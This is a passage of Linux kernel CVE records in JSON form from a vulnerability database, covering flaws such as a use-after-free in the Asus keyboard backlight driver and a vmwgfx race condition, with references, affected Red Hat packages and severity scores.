{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T05:32:46.383Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/next/linux-next.git/commit/?id=4ab3a086d10eeec1424f2e8a968827a6336203df" }, { "name": "[debian-lts-announce] 20230502 [SECURITY] [DLA 3404-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00005.html" }, { "name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Linux kernel", "vendor": "n/a", "versions": [ { "status": "affected", "version": "unknown" } ] } ], "descriptions": [ { "lang": "en", "value": "A flaw was found in the Linux kernel. A use-after-free may be triggered in asus_kbd_backlight_set when plugging/disconnecting in a malicious USB device, which advertises itself as an Asus device. Similarly to the previous known CVE-2023-25012, but in asus devices, the work_struct may be scheduled by the LED controller while the device is disconnecting, triggering a use-after-free on the struct asus_kbd_leds *led structure. A malicious USB device may exploit the issue to cause memory corruption with controlled data." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-05-03T00:00:00", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/next/linux-next.git/commit/?id=4ab3a086d10eeec1424f2e8a968827a6336203df" }, { "name": "[debian-lts-announce] 20230502 [SECURITY] [DLA 3404-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00005.html" }, { "name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-1079", "datePublished": "2023-03-27T00:00:00", "dateReserved": "2023-02-27T00:00:00", "dateUpdated": "2024-08-02T05:32:46.383Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-30456
Vulnerability from cvelistv5
Published
2023-04-10 00:00
Modified
2024-08-02 14:28
Severity ?
EPSS score ?
Summary
An issue was discovered in arch/x86/kvm/vmx/nested.c in the Linux kernel before 6.2.8. nVMX on x86_64 lacks consistency checks for CR0 and CR4.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T14:28:50.514Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://github.com/torvalds/linux/commit/112e66017bff7f2837030f34c2bc19501e9212d5" }, { "tags": [ "x_transferred" ], "url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.2.8" }, { "name": "[debian-lts-announce] 20230502 [SECURITY] [DLA 3404-1] linux-5.10 security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00005.html" }, { "name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230511-0007/" }, { "tags": [ "x_transferred" ], "url": "http://packetstormsecurity.com/files/173757/Kernel-Live-Patch-Security-Notice-LSN-0096-1.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "An issue was discovered in arch/x86/kvm/vmx/nested.c in the Linux kernel before 6.2.8. nVMX on x86_64 lacks consistency checks for CR0 and CR4." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2023-07-26T00:00:00", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://github.com/torvalds/linux/commit/112e66017bff7f2837030f34c2bc19501e9212d5" }, { "url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.2.8" }, { "name": "[debian-lts-announce] 20230502 [SECURITY] [DLA 3404-1] linux-5.10 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00005.html" }, { "name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html" }, { "url": "https://security.netapp.com/advisory/ntap-20230511-0007/" }, { "url": "http://packetstormsecurity.com/files/173757/Kernel-Live-Patch-Security-Notice-LSN-0096-1.html" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2023-30456", "datePublished": "2023-04-10T00:00:00", "dateReserved": "2023-04-10T00:00:00", "dateUpdated": "2024-08-02T14:28:50.514Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-33203
Vulnerability from cvelistv5
Published
2023-05-18 00:00
Modified
2024-08-02 15:39
Severity ?
EPSS score ?
Summary
The Linux kernel before 6.2.9 has a race condition and resultant use-after-free in drivers/net/ethernet/qualcomm/emac/emac.c if a physically proximate attacker unplugs an emac based device.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T15:39:35.885Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://bugzilla.suse.com/show_bug.cgi?id=1210685" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=6b6bc5b8bd2d4ca9e1efa9ae0f98a0b0687ace75" }, { "tags": [ "x_transferred" ], "url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.2.9" }, { "tags": [ "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2192667" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "The Linux kernel before 6.2.9 has a race condition and resultant use-after-free in drivers/net/ethernet/qualcomm/emac/emac.c if a physically proximate attacker unplugs an emac based device." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2023-05-23T00:00:00", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://bugzilla.suse.com/show_bug.cgi?id=1210685" }, { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=6b6bc5b8bd2d4ca9e1efa9ae0f98a0b0687ace75" }, { "url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.2.9" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2192667" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2023-33203", "datePublished": "2023-05-18T00:00:00", "dateReserved": "2023-05-18T00:00:00", "dateUpdated": "2024-08-02T15:39:35.885Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-33951
Vulnerability from cvelistv5
Published
2023-07-24 15:19
Modified
2024-09-13 18:38
Severity ?
EPSS score ?
Summary
Kernel: vmwgfx: race condition leading to information disclosure vulnerability
References
▼ | URL | Tags |
---|---|---|
https://access.redhat.com/errata/RHSA-2023:6583 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2023:6901 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2023:7077 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:1404 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:4823 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/errata/RHSA-2024:4831 | vendor-advisory, x_refsource_REDHAT | |
https://access.redhat.com/security/cve/CVE-2023-33951 | vdb-entry, x_refsource_REDHAT | |
https://bugzilla.redhat.com/show_bug.cgi?id=2218195 | issue-tracking, x_refsource_REDHAT | |
https://www.zerodayinitiative.com/advisories/ZDI-CAN-20110/ |
Impacted products
{ "containers": { "adp": [ { "metrics": [ { "other": { "content": { "id": "CVE-2023-33951", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-02-26T17:35:27.034494Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-06-04T17:22:07.492Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-02T15:54:14.118Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "RHSA-2023:6583", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2023:6583" }, { "name": "RHSA-2023:6901", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2023:6901" }, { "name": "RHSA-2023:7077", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2023:7077" }, { "name": "RHSA-2024:1404", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1404" }, { "name": "RHSA-2024:4823", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:4823" }, { "name": "RHSA-2024:4831", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:4831" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-33951" }, { "name": "RHBZ#2218195", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2218195" }, { "tags": [ "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-CAN-20110/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:8::realtime", "cpe:/a:redhat:enterprise_linux:8::nfv" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-513.5.1.rt7.307.el8_9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:8::baseos", "cpe:/a:redhat:enterprise_linux:8::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-513.5.1.el8_9", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:8.8::baseos", "cpe:/a:redhat:rhel_eus:8.8::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.8 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-477.51.1.el8_8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::nfv", "cpe:/a:redhat:enterprise_linux:9::appstream", "cpe:/a:redhat:enterprise_linux:9::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-362.8.1.el9_3", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:enterprise_linux:9::realtime", "cpe:/o:redhat:enterprise_linux:9::baseos", "cpe:/a:redhat:enterprise_linux:9::nfv", "cpe:/a:redhat:enterprise_linux:9::appstream", "cpe:/a:redhat:enterprise_linux:9::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-362.8.1.el9_3", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.2::crb", "cpe:/a:redhat:rhel_eus:9.2::appstream", "cpe:/o:redhat:rhel_eus:9.2::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9.2 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-284.75.1.el9_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.2::realtime", "cpe:/a:redhat:rhel_eus:9.2::nfv" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9.2 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-284.75.1.rt14.360.el9_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:6" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 6", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unaffected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:7" ], "defaultStatus": "unaffected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 7", "vendor": "Red Hat" }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:enterprise_linux:9" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9", "vendor": "Red Hat" } ], "datePublic": "2023-02-15T00:00:00+00:00", "descriptions": [ { "lang": "en", "value": "A race condition vulnerability was found in the vmwgfx driver in the Linux kernel. The flaw exists within the handling of GEM objects. The issue results from improper locking when performing operations on an object. This flaw allows a local privileged user to disclose information in the context of the kernel." } ], "metrics": [ { "other": { "content": { "namespace": "https://access.redhat.com/security/updates/classification/", "value": "Moderate" }, "type": "Red Hat severity rating" } }, { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "LOW", "baseScore": 6.7, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:L", "version": "3.1" }, "format": "CVSS" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-200", "description": "Exposure of Sensitive Information to an Unauthorized Actor", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-09-13T18:38:54.859Z", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "name": "RHSA-2023:6583", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2023:6583" }, { "name": "RHSA-2023:6901", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2023:6901" }, { "name": "RHSA-2023:7077", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2023:7077" }, { "name": "RHSA-2024:1404", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:1404" }, { "name": "RHSA-2024:4823", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:4823" }, { "name": "RHSA-2024:4831", "tags": [ "vendor-advisory", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/errata/RHSA-2024:4831" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT" ], "url": "https://access.redhat.com/security/cve/CVE-2023-33951" }, { "name": "RHBZ#2218195", "tags": [ "issue-tracking", "x_refsource_REDHAT" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2218195" }, { "url": "https://www.zerodayinitiative.com/advisories/ZDI-CAN-20110/" } ], "timeline": [ { "lang": "en", "time": "2023-06-28T00:00:00+00:00", "value": "Reported to Red Hat." }, { "lang": "en", "time": "2023-02-15T00:00:00+00:00", "value": "Made public." } ], "title": "Kernel: vmwgfx: race condition leading to information disclosure vulnerability", "workarounds": [ { "lang": "en", "value": "This flaw can be mitigated by preventing the affected `vmwgfx` kernel module from being loaded. For instructions on how to blacklist a kernel module, please see https://access.redhat.com/solutions/41278." } ], "x_redhatCweChain": "CWE-362-\u003eCWE-200: Concurrent Execution using Shared Resource with Improper Synchronization (\u0027Race Condition\u0027) leads to Exposure of Sensitive Information to an Unauthorized Actor" } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2023-33951", "datePublished": "2023-07-24T15:19:24.967Z", "dateReserved": "2023-05-24T07:11:47.572Z", "dateUpdated": "2024-09-13T18:38:54.859Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-45862
Vulnerability from cvelistv5
Published
2023-10-14 00:00
Modified
2024-08-02 20:29
Severity ?
EPSS score ?
Summary
An issue was discovered in drivers/usb/storage/ene_ub6250.c for the ENE UB6250 reader driver in the Linux kernel before 6.2.5. An object could potentially extend beyond the end of an allocation.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T20:29:32.571Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=ce33e64c1788912976b61314b56935abd4bc97ef" }, { "tags": [ "x_transferred" ], "url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.2.5" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20231116-0004/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "An issue was discovered in drivers/usb/storage/ene_ub6250.c for the ENE UB6250 reader driver in the Linux kernel before 6.2.5. An object could potentially extend beyond the end of an allocation." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2023-11-16T15:06:15.882498", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=ce33e64c1788912976b61314b56935abd4bc97ef" }, { "url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.2.5" }, { "url": "https://security.netapp.com/advisory/ntap-20231116-0004/" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2023-45862", "datePublished": "2023-10-14T00:00:00", "dateReserved": "2023-10-14T00:00:00", "dateUpdated": "2024-08-02T20:29:32.571Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-7192
Vulnerability from cvelistv5
Published
2024-01-02 19:02
Modified
2024-09-16 17:01
Severity ?
EPSS score ?
Summary
Kernel: refcount leak in ctnetlink_create_conntrack()
References
Impacted products
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T08:57:34.101Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "RHSA-2024:0723", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0723" }, { "name": "RHSA-2024:0725", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:0725" }, { "name": "RHSA-2024:1188", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1188" }, { "name": "RHSA-2024:1250", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1250" }, { "name": "RHSA-2024:1306", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1306" }, { "name": "RHSA-2024:1367", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1367" }, { "name": "RHSA-2024:1382", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1382" }, { "name": "RHSA-2024:1404", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:1404" }, { "name": "RHSA-2024:2006", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2006" }, { "name": "RHSA-2024:2008", "tags": [ "vendor-advisory", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/errata/RHSA-2024:2008" }, { "tags": [ "vdb-entry", "x_refsource_REDHAT", "x_transferred" ], "url": "https://access.redhat.com/security/cve/CVE-2023-7192" }, { "name": "RHBZ#2256279", "tags": [ "issue-tracking", "x_refsource_REDHAT", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2256279" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/commit/?id=ac4893980bbe79ce383daf9a0885666a30fe4c83" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_aus:8.2::baseos", "cpe:/o:redhat:rhel_tus:8.2::baseos", "cpe:/o:redhat:rhel_e4s:8.2::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.2 Advanced Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-193.133.1.el8_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_tus:8.2::realtime", "cpe:/a:redhat:rhel_tus:8.2::nfv" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 8.2 Telecommunications Update Service", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-193.133.1.rt13.184.el8_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_aus:8.2::baseos", "cpe:/o:redhat:rhel_tus:8.2::baseos", "cpe:/o:redhat:rhel_e4s:8.2::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.2 Telecommunications Update Service", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-193.133.1.el8_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_aus:8.2::baseos", "cpe:/o:redhat:rhel_tus:8.2::baseos", "cpe:/o:redhat:rhel_e4s:8.2::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-193.133.1.el8_2", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_e4s:8.4::baseos", "cpe:/o:redhat:rhel_aus:8.4::baseos", "cpe:/o:redhat:rhel_tus:8.4::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-305.125.1.el8_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_tus:8.4::realtime", "cpe:/a:redhat:rhel_tus:8.4::nfv" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 8.4 Telecommunications Update Service", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-305.125.1.rt7.201.el8_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_e4s:8.4::baseos", "cpe:/o:redhat:rhel_aus:8.4::baseos", "cpe:/o:redhat:rhel_tus:8.4::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.4 Telecommunications Update Service", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-305.125.1.el8_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_e4s:8.4::baseos", "cpe:/o:redhat:rhel_aus:8.4::baseos", "cpe:/o:redhat:rhel_tus:8.4::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-305.125.1.el8_4", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:8.6::baseos", "cpe:/a:redhat:rhel_eus:8.6::crb", "cpe:/o:redhat:rhev_hypervisor:4.4::el8" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.6 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-372.95.1.el8_6", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/o:redhat:rhel_eus:8.8::baseos", "cpe:/a:redhat:rhel_eus:8.8::crb" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 8.8 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:4.18.0-477.51.1.el8_8", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.0::crb", "cpe:/a:redhat:rhel_eus:9.0::appstream", "cpe:/o:redhat:rhel_eus:9.0::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat Enterprise Linux 9.0 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-70.93.2.el9_0", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.0::nfv", "cpe:/a:redhat:rhel_eus:9.0::realtime" ], "defaultStatus": "affected", "packageName": "kernel-rt", "product": "Red Hat Enterprise Linux 9.0 Extended Update Support", "vendor": "Red Hat", "versions": [ { "lessThan": "*", "status": "unaffected", "version": "0:5.14.0-70.93.1.rt21.165.el9_0", "versionType": "rpm" } ] }, { "collectionURL": "https://access.redhat.com/downloads/content/package-browser/", "cpes": [ "cpe:/a:redhat:rhel_eus:9.2::crb", "cpe:/a:redhat:rhel_eus:9.2::appstream", "cpe:/o:redhat:rhel_eus:9.2::baseos" ], "defaultStatus": "affected", "packageName": "kernel", "product": "Red Hat 